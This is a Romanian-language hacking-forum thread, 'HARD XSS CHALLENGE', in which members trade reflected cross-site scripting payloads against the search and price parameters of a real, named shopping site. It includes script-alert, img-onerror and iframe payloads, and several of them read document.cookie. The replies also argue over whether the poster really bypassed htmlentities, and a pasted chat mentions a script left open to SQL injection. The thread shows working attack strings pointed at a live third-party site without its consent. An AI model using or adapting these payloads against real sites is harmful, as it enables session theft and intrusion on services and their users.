Jump to content
Goke

HARD XSS CHALLENGE

Recommended Posts

Posted (edited)

http://www.compari.ro/CategorySearch.php?st=

vectorul sa fie exact dupa ?st=

gen

http://www.compari.ro/CategorySearch.php?st=<script>alert(1)</script>

ci nu

http://www.compari.ro/CategorySearch.php?st=graficard&noredirect=&minprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&maxprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&orderby=9

Facut de cineva...(nu dau nume)

http://i.imgur.com/stLQEdk.png

NU AS FI VRUT SA DAU HINT... CA DUPA S-AR PRINDE TOATA LUMEA .. CRED CA VOI REGRETA DAR IN FINE :))

HINT=" + "

Edited by Goke
  • Downvote 1
Posted

Imi pare rau ca ai sters topicul vechi, in care iti luasei fail si ai spus ca parametrul este st dar tu facusei xssul la compara pret.

Cum mi-am dat seama?

1.Daca bagi orice vector in search, nu iti apare nimic, niciun rezultat, pe cand tie ti-au aparut rezultate care nu au treaba.

2.Cenzurasei campul de la compara pret.

3.Aveai prtscr la fel ca al meu. (adica era in acelasi loc)

Posted
  Goke said:

//Stiind ca a face bypass la htmlentities este un lucru imposibil ,uitati ca aici nu este imposibil ^_^//

Bypass la htmlentities se poate face in unele cazuri ideale.Iin cazul tau vectorul executat nu este cel afisat prin htmlentities, n-ai facut nici un bypass stai linistit.

Posted
  Quote

[1:06:14 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: ma ajuti cu un host ?

[1:06:18 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: free

[1:06:22 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: ca am de la hostinger

[1:06:24 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: si

[1:06:28 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: numi place ,,

[1:06:35 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: mai demult mergea

[1:06:50 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: miam facut un script de conecatre la baza de date vulnerabil la sqli

[1:06:59 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: dar acum cand incerc order by

[1:07:01 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: nu mai merge

[1:07:08 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: si cred ca e de la host

Mda,cam a?a ceva pe skype.

  • Downvote 1
Posted

Scuze :D

compari.ro/CategorySearch.php?st=“/><script>alert(1);</script>

compari.ro/CategorySearch.php?st=‘>aaaaa<script>alert(document.cookie)</script>

compari.ro/CategorySearch.php?st=->”<''<iframe src=http://rstforums.com onload=alert(document.cookie)<

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...